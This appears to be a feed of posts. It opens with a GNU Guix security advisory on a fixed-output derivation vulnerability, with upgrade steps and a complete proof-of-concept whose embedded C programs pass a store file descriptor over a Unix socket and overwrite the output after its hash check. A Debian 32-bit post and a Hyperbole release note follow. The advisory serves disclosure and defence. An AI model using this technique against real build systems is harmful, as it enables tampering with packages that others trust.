In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.

Mitigation

This security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.

While several possible mitigation strategies were detailed in the original report, the simplest fix is just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.

A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with

guix build -f fixed-output-derivation-corruption.scm -M4

This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!

The corrupted file can be removed with

guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

In general, corrupt files from the store can be found with

guix gc --verify=contents

which will also include any files corrupted by through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.

For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,

guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,

sudo --login guix pull
sudo systemctl restart guix-daemon.service

Note that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Conclusion

One of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, using the ingredients of how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability with moderate impact.

Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.

Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.

Proof of Concept

Below is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run following the instructions above, in "Mitigation." Some further details and example output can be found on issue #69728

;; Checking for CVE-2024-27297.
;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>.

(use-modules (guix)
             (guix modules)
             (guix profiles)
             (gnu packages)
             (gnu packages gnupg)
             (gcrypt hash)
             ((rnrs bytevectors) #:select (string->utf8)))

(define (compiled-c-code name source)
  (define build-profile
    (profile (content (specifications->manifest '("gcc-toolchain")))))

  (define build
    (with-extensions (list guile-gcrypt)
     (with-imported-modules (source-module-closure '((guix build utils)
                                                     (guix profiles)))
       #~(begin
           (use-modules (guix build utils)
                        (guix profiles))
           (load-profile #+build-profile)
           (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))

  (computed-file name build))

(define sender-source
  (plain-file "sender.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <errno.h>

      int main(int argc, char **argv) {
          setvbuf(stdout, NULL, _IOLBF, 0);

          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Set up an abstract domain socket path to connect to.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");

          // Now try to connect, To ensure we work no matter what order we are
          // executed in, just busyloop here.
          int res = -1;
          while (res < 0) {
              printf(\"attempting connection...\\n\");
              res = connect(sock, (const struct sockaddr *)&data,
                  offsetof(struct sockaddr_un, sun_path)
                    + strlen(\"dihutenosa\")
                    + 1);
              if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
              if (errno != ECONNREFUSED) break;
              usleep(500000);
          }

          // Write our message header.
          struct msghdr msg = {0};
          msg.msg_control = malloc(128);
          msg.msg_controllen = 128;

          // Write an SCM_RIGHTS message containing the output path.
          struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
          hdr->cmsg_len = CMSG_LEN(sizeof(int));
          hdr->cmsg_level = SOL_SOCKET;
          hdr->cmsg_type = SCM_RIGHTS;
          int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
          memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));

          msg.msg_controllen = CMSG_SPACE(sizeof(int));

          // Write a single null byte too.
          msg.msg_iov = malloc(sizeof(struct iovec));
          msg.msg_iov[0].iov_base = \"\";
          msg.msg_iov[0].iov_len = 1;
          msg.msg_iovlen = 1;

          // Send it to the othher side of this connection.
          res = sendmsg(sock, &msg, 0);
          if (res < 0) perror(\"sendmsg\");
          int buf;

          // Wait for the server to close the socket, implying that it has
          // received the commmand.
          recv(sock, (void *)&buf, sizeof(int), 0);
      }"))

(define receiver-source
  (mixed-text-file "receiver.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <sys/inotify.h>

      int main(int argc, char **argv) {
          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Bind to the socket.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");
          int res = bind(sock, (const struct sockaddr *)&data,
              offsetof(struct sockaddr_un, sun_path)
              + strlen(\"dihutenosa\")
              + 1);
          if (res < 0) perror(\"bind\");

          res = listen(sock, 1);
          if (res < 0) perror(\"listen\");

          while (1) {
              setvbuf(stdout, NULL, _IOLBF, 0);
              printf(\"accepting connections...\\n\");
              int a = accept(sock, 0, 0);
              if (a < 0) perror(\"accept\");

              struct msghdr msg = {0};
              msg.msg_control = malloc(128);
              msg.msg_controllen = 128;

              // Receive the file descriptor as sent by the smuggler.
              recvmsg(a, &msg, 0);

              struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
              while (hdr) {
                  if (hdr->cmsg_level == SOL_SOCKET
                   && hdr->cmsg_type == SCM_RIGHTS) {
                      int res;

                      // Grab the copy of the file descriptor.
                      memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));
                      printf(\"preparing our hand...\\n\");

                      ftruncate(res, 0);
                      // Write the expected contents to the file, tricking Nix
                      // into accepting it as matching the fixed-output hash.
                      write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));

                      // But wait, the file is bigger than this! What could
                      // this code hide?

                      // First, we do a bit of a hack to get a path for the
                      // file descriptor we received. This is necessary because
                      // that file doesn't exist in our mount namespace!
                      char buf[128];
                      sprintf(buf, \"/proc/self/fd/%d\", res);

                      // Hook up an inotify on that file, so whenever Nix
                      // closes the file, we get notified.
                      int inot = inotify_init();
                      inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);

                      // Notify the smuggler that we've set everything up for
                      // the magic trick we're about to do.
                      close(a);

                      // So, before we continue with this code, a trip into Nix
                      // reveals a small flaw in fixed-output derivations. When
                      // storing their output, Nix has to hash them twice. Once
                      // to verify they match the \"flat\" hash of the derivation
                      // and once more after packing the file into the NAR that
                      // gets sent to a binary cache for others to consume. And
                      // there's a very slight window inbetween, where we could
                      // just swap the contents of our file. But the first hash
                      // is still noted down, and Nix will refuse to import our
                      // NAR file. To trick it, we need to write a reference to
                      // a store path that the source code for the smuggler drv
                      // references, to ensure it gets picked up. Continuing...

                      // Wait for the next inotify event to drop:
                      read(inot, buf, 128);

                      // first read + CA check has just been done, Nix is about
                      // to chown the file to root. afterwards, refscanning
                      // happens...

                      // Empty the file, seek to start.
                      ftruncate(res, 0);
                      lseek(res, 0, SEEK_SET);

                      // We swap out the contents!
                      static const char content[] = \"This file has been corrupted!\\n\";
                      write(res, content, strlen (content));
                      close(res);

                      printf(\"swaptrick finished, now to wait..\\n\");
                      return 0;
                  }

                  hdr = CMSG_NXTHDR(&msg, hdr);
              }
              close(a);
          }
      }"))

(define nonce
  (string-append "-" (number->string (car (gettimeofday)) 16)
                 "-" (number->string (getpid))))

(define original-text
  "This is the original text, before corruption.")

(define derivation-that-exfiltrates-fd
  (computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
                 (with-imported-modules '((guix build utils))
                   #~(begin
                       (use-modules (guix build utils))
                       (invoke #+(compiled-c-code "sender" sender-source))
                       (call-with-output-file #$output
                         (lambda (port)
                           (display #$original-text port)))))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256
                                      (string->utf8 original-text)))))

(define derivation-that-grabs-fd
  (computed-file (string-append "derivation-that-grabs-fd" nonce)
                 #~(begin
                     (open-output-file #$output) ;make sure there's an output
                     (execl #+(compiled-c-code "receiver" receiver-source)
                            "receiver"))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 #vu8()))))

(define check
  (computed-file "checking-for-vulnerability"
                 #~(begin
                     (use-modules (ice-9 textual-ports))

                     (mkdir #$output)            ;make sure there's an output
                     (format #t "This depends on ~a, which will grab the file
descriptor and corrupt ~a.~%~%"
                             #+derivation-that-grabs-fd
                             #+derivation-that-exfiltrates-fd)

                     (let ((content (call-with-input-file
                                        #+derivation-that-exfiltrates-fd
                                      get-string-all)))
                       (format #t "Here is what we see in ~a: ~s~%~%"
                               #+derivation-that-exfiltrates-fd content)
                       (if (string=? content #$original-text)
                           (format #t "Failed to corrupt ~a, \
your system is safe.~%"
                                   #+derivation-that-exfiltrates-fd)
                           (begin
                             (format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
                                     #+derivation-that-exfiltrates-fd)
                             (exit 1)))))))

check

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

grey@sysad.org

Debian is going to drop support for all 32 bit computers in next release!

https://www.theregister.com/2023/12/19/debian_to_drop_x86_32/

Debian preps ground to drop 32-bit x86 as separate edition
Bad news for several downstream distros, but good news for NetBSD

After a recent meetup in Cambridge, Debian developers are discussing how to start gradually dropping 32-bit x86 support.

One immediately visible result is a message entitled "Bits from the Release Team" on the debian-devel-announce mailing list, with significant news: The end of the line for Debian as a 32-bit distro is approaching. Note, though, this doesn't mean that 32-bit support is going away altogether. Not yet anyway.

The news is in a section titled "A future for the i386 architecture":

Insofar as they still do, we anticipate that the kernel, d-i and images teams will cease to support i386 in the near future.

So, this really sucks for a lot of other people and distros. Like it or not there's shitloads of 32 bit hardware around the planet. A lot of it is currently running! Sadly most of it is running Windows, still. Which is bad because it's so unsafe to keep old versions of Windows touching the internet. But much of it is kept both running and safe by having it run Debian, or a 32 bit distro based on Debian. For any old hardware most peoples go-to distro is Debian. Nobody else is supporting old hardware like Debian is. Plus if someone want's to make their own spin on a distro for old hardware they pretty much always used Debian as a base for it, so there's a lot of distros out there that are gonna die because of this. Like for example #antix #mxlinux #bunsenlabs #slax #peppermintos so this sucks bad.

#debian #32bit #linux #gnu

federatica_bot@federatica.space

hyperbole @ Savannah: GNU Hyperbole Major Release 9 (V9.0.1) Rhapsody

Overview

GNU Hyperbole 9.0.1, the Rhapsody release, is now available on GNU ELPA.

And oh what a release it is: extensive new features, new video

demos, org and org roam integration, Markdown and Org file support in

HyRolo, recursive directory and wildcard file scanning in HyRolo, and

much more.

What's new in this release is extensively described here:

www.gnu.org/s/hyperbole/HY-NEWS.html

Everything back until release 8.0.0 is new since the last major release

announcement (almost a year and a half ago), so updates are extensive.

Hyperbole is like Markdown for hypertext. Hyperbole automatically

recognizes dozens of common patterns in any buffer regardless of mode

and transparently turns them into hyperbuttons you can instantly

activate with a single key. Email addresses, URLs, grep -n outputs,

programming backtraces, sequences of Emacs keys, programming

identifiers, Texinfo and Info cross-references, Org links, Markdown

links and on and on. All you do is load Hyperbole and then your text

comes to life with no extra effort or complex formatting.

But Hyperbole is also a personal information manager with built-in

capabilities of contact management/hierarchical record lookup,

legal-numbered outlines with hyperlinkable views and a unique window

and frame manager. It is even Org-compatible so you can use all of

Org's capabilities together with Hyperbole.

Hyperbole stays out of your way but is always a key press away when

you need it. Like Emacs, Org, Counsel and Helm, Hyperbole has many

different uses, all based around the theme of reducing cognitive load

and improving your everyday information management. It reduces

cognitive load by using a single Action Key, {M-RET}, across many

different contexts to perform the best default action in each.

Hyperbole has always been one of the best documented Emacs packages.

With Version 9 comes excellent test coverage: over 400 automated tests

are run with every update against every major version of Emacs since

version 27, to ensure quality. We hope you'll give it a try.

Videos

If you prefer video introductions, visit the videos linked to below;

otherwise, skip to the next section.

GNU Hyperbole Videos with Web Links

Installing and Using Hyperbole

To install within GNU Emacs, use:

{M-x package-install RET hyperbole RET}

Hyperbole installs in less than a minute and can be uninstalled even

faster if ever need be. Give it a try.

Then to invoke its minibuffer menu, use:

{C-h h} or {M-x hyperbole RET}

The best way to get a feel for many of its capabilities is to invoke the

all new, interactive FAST-DEMO and explore sections of interest:

{C-h h d d}

To permanently activate Hyperbole in your Emacs initialization file, add

the line:

(hyperbole-mode 1)

Hyperbole is a minor mode that may be disabled at any time with:

{C-u 0 hyperbole-mode RET}

The Hyperbole home page with screenshots is here:

www.gnu.org/s/hyperbole

For use cases, see:

www.gnu.org/s/hyperbole/HY-WHY.html

For what users think about Hyperbole, see:

www.gnu.org/s/hyperbole/hyperbole.html#user-quotes

Enjoy,

The Hyperbole Team

#gnu #gnuorg #opensource